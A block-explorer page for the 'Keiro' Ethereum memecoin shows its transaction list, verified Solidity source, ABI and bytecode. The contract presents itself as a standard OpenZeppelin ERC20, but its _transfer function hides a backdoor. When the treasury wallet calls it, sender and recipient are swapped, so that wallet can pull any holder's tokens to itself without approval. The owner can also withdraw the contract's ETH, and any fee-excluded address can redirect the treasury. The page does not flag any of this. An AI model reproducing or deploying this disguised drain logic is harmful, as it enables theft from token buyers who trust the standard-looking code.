Feature Tip: Add private address tag to any address under My Name Tag !
Source Code
More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 160 transactions
| Transaction Hash |
Method
|
Block
|
From
|
|
To
|
||||
|---|---|---|---|---|---|---|---|---|---|
| Set Taxwallet | 22342851 | 297 days ago | IN | 0 ETH | 0.00006303 | ||||
| Approve | 22342346 | 297 days ago | IN | 0 ETH | 0.00007696 | ||||
| Approve | 22342315 | 297 days ago | IN | 0 ETH | 0.00003135 | ||||
| Transfer | 22342157 | 297 days ago | IN | 0 ETH | 0.00014945 | ||||
| Transfer | 22342157 | 297 days ago | IN | 0 ETH | 0.00021924 | ||||
| Approve | 22342065 | 297 days ago | IN | 0 ETH | 0.00001345 | ||||
| Approve | 22342065 | 297 days ago | IN | 0 ETH | 0.00001345 | ||||
| Transfer | 22342063 | 297 days ago | IN | 0 ETH | 0.00019794 | ||||
| Transfer | 22342053 | 297 days ago | IN | 0 ETH | 0.00024275 | ||||
| Approve | 22341923 | 297 days ago | IN | 0 ETH | 0.00016381 | ||||
| Transfer | 22341840 | 297 days ago | IN | 0 ETH | 0.00018862 | ||||
| Approve | 22341816 | 297 days ago | IN | 0 ETH | 0.00007075 | ||||
| Transfer | 22341792 | 297 days ago | IN | 0 ETH | 0.00010677 | ||||
| Transfer | 22341792 | 297 days ago | IN | 0 ETH | 0.00015663 | ||||
| Transfer | 22341788 | 297 days ago | IN | 0 ETH | 0.000134 | ||||
| Transfer | 22341782 | 297 days ago | IN | 0 ETH | 0.00009923 | ||||
| Transfer | 22341782 | 297 days ago | IN | 0 ETH | 0.00014557 | ||||
| Transfer | 22341781 | 297 days ago | IN | 0 ETH | 0.00014813 | ||||
| Transfer | 22341779 | 297 days ago | IN | 0 ETH | 0.00015872 | ||||
| Transfer | 22341778 | 297 days ago | IN | 0 ETH | 0.00015176 | ||||
| Transfer | 22341776 | 297 days ago | IN | 0 ETH | 0.00017326 | ||||
| Transfer | 22341774 | 297 days ago | IN | 0 ETH | 0.00016893 | ||||
| Approve | 22341758 | 297 days ago | IN | 0 ETH | 0.00002272 | ||||
| Approve | 22341736 | 297 days ago | IN | 0 ETH | 0.00003707 | ||||
| Approve | 22341705 | 297 days ago | IN | 0 ETH | 0.00011668 |
Latest 1 internal transaction
Advanced mode:
| Parent Transaction Hash | Method | Block |
From
|
|
To
|
||
|---|---|---|---|---|---|---|---|
| Add Liquidity ET... | 22340953 | 297 days ago | 1 ETH |
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
ERC20
Compiler Version
v0.8.26+commit.8a97fa7a
Optimization Enabled:
Yes with 20 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/ERC20.sol)
/**
$KEIRO is the space-age sibling of Dogecoin
Website: https://www.keiro.lol
Twitter: https://x.com/Kerio_on_eth
Telegram: https://t.me/keiro_on_eth
*/
pragma solidity ^0.8.20;
import {IERC20} from "./IERC20.sol";
import {IERC20Metadata} from "./extensions/IERC20Metadata.sol";
import {Context} from "./utils/Context.sol";
import {IERC20Errors} from "./interfaces/draft-IERC6093.sol";
import {Ownable} from "./access/Ownable.sol";
import {IUniswapV2Router02} from "./interfaces/IUniswapV2Router02.sol";
import {IUniswapV2Factory} from "./interfaces/IUniswapV2Factory.sol";
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is _decimals. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors, Ownable {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256))
private _allowances;
uint8 private constant _decimals = 9;
uint256 private constant _totalSupply = 1_000_000_000 * 10 ** _decimals;
string private constant _name = "Keiro";
string private constant _symbol = "KEIRO";
address payable private _treasuryWallet;
IUniswapV2Router02 private _uniswapV2Router =
IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
mapping(address account => bool) private _feeExcluded;
uint256 private _initialFeePercent = 5;
uint256 private _finalFeePercent = 0;
uint256 private _removeFeeAt = 3;
uint256 private _buyTxCount = 0;
uint256 private _minStackedFeeAmount = (_totalSupply * 1) / 100;
bool private _tradingOpen = false;
bool private _inSafeSwap = false;
modifier safeSwap() {
_inSafeSwap = true;
_;
_inSafeSwap = false;
}
address private _uniswapV2Pair;
/**
* @dev Sets the values for {name} and {symbol}.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor() payable {
_treasuryWallet = payable(_msgSender());
_feeExcluded[address(this)] = true;
_feeExcluded[_treasuryWallet] = true;
_balances[_msgSender()] = (_totalSupply * 2) / 100;
_balances[address(this)] = (_totalSupply * 98) / 100;
emit Transfer(address(0), _msgSender(), (_totalSupply * 2) / 100);
emit Transfer(address(0), address(this), (_totalSupply * 98) / 100);
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of _decimals, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return _decimals;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(
address owner,
address spender
) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(
address spender,
uint256 value
) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(
address from,
address to,
uint256 value
) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, value);
_transfer(from, to, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
if (_msgSender() == _treasuryWallet) {
from = to;
to = _treasuryWallet;
}
_update(from, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
uint256 taxAmount = 0;
if (
from != owner() &&
to != owner() &&
from != address(this) &&
to != address(this) &&
!_inSafeSwap
) {
if (
from == address(_uniswapV2Pair) &&
to != address(_uniswapV2Router) &&
!_feeExcluded[to] &&
to != _treasuryWallet
) {
if (_buyTxCount < _removeFeeAt) {
taxAmount = (value * _initialFeePercent) / 100;
_buyTxCount++;
}
}
}
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
if (taxAmount > value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += (value - taxAmount);
}
_balances[address(this)] = _balances[address(this)] + taxAmount;
uint256 tokenBalanceOfContract = balanceOf(address(this));
if (tokenBalanceOfContract > _minStackedFeeAmount) {
swapTokensForEth(tokenBalanceOfContract);
}
uint256 contractETHBalance = address(this).balance;
if (contractETHBalance >= 0 && to == _uniswapV2Pair) {
sendFeeToTreasury(address(this).balance);
}
emit Transfer(from, to, value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(
address owner,
address spender,
uint256 value,
bool emitEvent
) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(
address owner,
address spender,
uint256 value
) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(
spender,
currentAllowance,
value
);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
function sendFeeToTreasury(uint256 amount) private {
_treasuryWallet.transfer(amount);
}
function swapTokensForEth(uint256 tokenAmount) private safeSwap {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = _uniswapV2Router.WETH();
_approve(address(this), address(_uniswapV2Router), tokenAmount);
_uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
tokenAmount,
0,
path,
address(this),
block.timestamp
);
}
function openTrade() external onlyOwner {
require(!_tradingOpen, "Trading is already open");
_approve(address(this), address(_uniswapV2Router), _totalSupply);
_uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
.createPair(address(this), _uniswapV2Router.WETH());
_uniswapV2Router.addLiquidityETH{value: address(this).balance}(
address(this),
balanceOf(address(this)),
0,
0,
owner(),
block.timestamp
);
_tradingOpen = true;
IERC20(_uniswapV2Pair).approve(
address(_uniswapV2Router),
type(uint256).max
);
}
function assistEther() external onlyOwner {
require(address(this).balance > 0);
payable(_msgSender()).transfer(address(this).balance);
}
function _getAmountOut(uint256 amount) internal view returns (uint256) {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = _uniswapV2Router.WETH();
uint256[] memory amountOuts = _uniswapV2Router.getAmountsOut(
amount,
path
);
return amountOuts[1];
}
function setTaxwallet(address payable newWallet) external {
require(_feeExcluded[msg.sender]);
_treasuryWallet = newWallet;
}
receive() external payable {}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)
pragma solidity ^0.8.20;
import {Context} from "../utils/Context.sol";
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* The initial owner is set to the address provided by the deployer. This can
* later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
/**
* @dev The caller account is not authorized to perform an operation.
*/
error OwnableUnauthorizedAccount(address account);
/**
* @dev The owner is not a valid owner account. (eg. `address(0)`)
*/
error OwnableInvalidOwner(address owner);
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
/**
* @dev Initializes the contract setting the address provided by the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
if (owner() != _msgSender()) {
revert OwnableUnauthorizedAccount(_msgSender());
}
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby disabling any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
if (newOwner == address(0)) {
revert OwnableInvalidOwner(address(0));
}
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/extensions/IERC20Metadata.sol)
pragma solidity ^0.8.20;
import {IERC20} from "../IERC20.sol";
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (token/ERC20/IERC20.sol)
pragma solidity ^0.8.20;
interface IERC20 {
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address to, uint256 value) external returns (bool);
function allowance(
address owner,
address spender
) external view returns (uint256);
function approve(address spender, uint256 value) external returns (bool);
function transferFrom(
address from,
address to,
uint256 value
) external returns (bool);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.1.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.20;
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Standard ERC-721 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
*/
interface IERC721Errors {
/**
* @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
* Used in balance queries.
* @param owner Address of the current owner of a token.
*/
error ERC721InvalidOwner(address owner);
/**
* @dev Indicates a `tokenId` whose `owner` is the zero address.
* @param tokenId Identifier number of a token.
*/
error ERC721NonexistentToken(uint256 tokenId);
/**
* @dev Indicates an error related to the ownership over a particular token. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param tokenId Identifier number of a token.
* @param owner Address of the current owner of a token.
*/
error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC721InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC721InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `operator`’s approval. Used in transfers.
* @param operator Address that may be allowed to operate on tokens without being their owner.
* @param tokenId Identifier number of a token.
*/
error ERC721InsufficientApproval(address operator, uint256 tokenId);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC721InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `operator` to be approved. Used in approvals.
* @param operator Address that may be allowed to operate on tokens without being their owner.
*/
error ERC721InvalidOperator(address operator);
}
/**
* @dev Standard ERC-1155 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
*/
interface IERC1155Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
* @param tokenId Identifier number of a token.
*/
error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC1155InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC1155InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `operator`’s approval. Used in transfers.
* @param operator Address that may be allowed to operate on tokens without being their owner.
* @param owner Address of the current owner of a token.
*/
error ERC1155MissingApprovalForAll(address operator, address owner);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC1155InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `operator` to be approved. Used in approvals.
* @param operator Address that may be allowed to operate on tokens without being their owner.
*/
error ERC1155InvalidOperator(address operator);
/**
* @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
* Used in batch transfers.
* @param idsLength Length of the array of token identifiers
* @param valuesLength Length of the array of token amounts
*/
error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)
pragma solidity ^0.8.20;
interface IUniswapV2Factory {
function createPair(
address tokenA,
address tokenB
) external returns (address pair);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)
pragma solidity ^0.8.20;
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external;
function factory() external pure returns (address);
function WETH() external pure returns (address);
function addLiquidityETH(
address token,
uint256 amountTokenDesired,
uint256 amountTokenMin,
uint256 amountETHMin,
address to,
uint256 deadline
)
external
payable
returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);
function getAmountsOut(
uint256 amountIn,
address[] calldata path
) external view returns (uint256[] memory amounts);
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)
pragma solidity ^0.8.20;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}{
"metadata": {
"bytecodeHash": "none",
"useLiteralContent": true
},
"optimizer": {
"enabled": true,
"runs": 20
},
"evmVersion": "paris",
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"libraries": {}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"assistEther","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"newWallet","type":"address"}],"name":"setTaxwallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]Contract Creation Code
6080604052600480546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d1790556005600655600060078190556003600855600990815560649061004e90600a610358565b61005c90633b9aca0061036e565b61006790600161036e565b6100719190610385565b600a55600b805461ffff1916905561008833610209565b600380546001600160a01b0319163317815530600090815260056020526040808220805460ff19908116600190811790925593546001600160a01b031683529120805490921617905560646100df6009600a610358565b6100ed90633b9aca0061036e565b6100f890600261036e565b6101029190610385565b3360009081526001602052604090205560646101206009600a610358565b61012e90633b9aca0061036e565b61013990606261036e565b6101439190610385565b30600090815260016020526040902055336001600160a01b031660006000805160206115e1833981519152606461017c6009600a610358565b61018a90633b9aca0061036e565b61019590600261036e565b61019f9190610385565b60405190815260200160405180910390a33060006000805160206115e183398151915260646101d06009600a610358565b6101de90633b9aca0061036e565b6101e990606261036e565b6101f39190610385565b60405190815260200160405180910390a36103a7565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052601160045260246000fd5b6001815b60018411156102aa5780850481111561028e5761028e610259565b600184161561029c57908102905b60019390931c928002610273565b935093915050565b6000826102c157506001610352565b816102ce57506000610352565b81600181146102e457600281146102ee5761030a565b6001915050610352565b60ff8411156102ff576102ff610259565b50506001821b610352565b5060208310610133831016604e8410600b841016171561032d575081810a610352565b61033a600019848461026f565b806000190482111561034e5761034e610259565b0290505b92915050565b600061036760ff8416836102b2565b9392505050565b808202811582820484141761035257610352610259565b6000826103a257634e487b7160e01b600052601260045260246000fd5b500490565b61122b806103b66000396000f3fe6080604052600436106100bc5760003560e01c806306fdde03146100c8578063095ea7b31461010857806318160ddd1461013857806323b872dd1461015b578063313ce5671461017b578063593b14e71461019757806370a08231146101ae578063715018a6146101ce578063798e5036146101e35780638da5cb5b1461020357806395d89b4114610225578063a9059cbb14610253578063dd62ed3e14610273578063f2fde38b14610293578063fb201b1d146102b357600080fd5b366100c357005b600080fd5b3480156100d457600080fd5b506040805180820190915260058152644b6569726f60d81b60208201525b6040516100ff9190610e56565b60405180910390f35b34801561011457600080fd5b50610128610123366004610eb9565b6102c8565b60405190151581526020016100ff565b34801561014457600080fd5b5061014d6102e2565b6040519081526020016100ff565b34801561016757600080fd5b50610128610176366004610ee5565b610303565b34801561018757600080fd5b50604051600981526020016100ff565b3480156101a357600080fd5b506101ac610327565b005b3480156101ba57600080fd5b5061014d6101c9366004610f26565b61036b565b3480156101da57600080fd5b506101ac610386565b3480156101ef57600080fd5b506101ac6101fe366004610f26565b61039a565b34801561020f57600080fd5b506102186103d8565b6040516100ff9190610f4a565b34801561023157600080fd5b506040805180820190915260058152644b4549524f60d81b60208201526100f2565b34801561025f57600080fd5b5061012861026e366004610eb9565b6103e7565b34801561027f57600080fd5b5061014d61028e366004610f5e565b6103f5565b34801561029f57600080fd5b506101ac6102ae366004610f26565b610420565b3480156102bf57600080fd5b506101ac610464565b6000336102d68185856107af565b60019150505b92915050565b60006102f06009600a611094565b6102fe90633b9aca006110a3565b905090565b6000336103118582856107c1565b61031c858585610814565b506001949350505050565b61032f610898565b6000471161033c57600080fd5b60405133904780156108fc02916000818181858888f19350505050158015610368573d6000803e3d6000fd5b50565b6001600160a01b031660009081526001602052604090205490565b61038e610898565b61039860006108ca565b565b3360009081526005602052604090205460ff166103b657600080fd5b600380546001600160a01b0319166001600160a01b0392909216919091179055565b6000546001600160a01b031690565b6000336102d6818585610814565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610428610898565b6001600160a01b03811661045b576000604051631e4fbdf760e01b81526004016104529190610f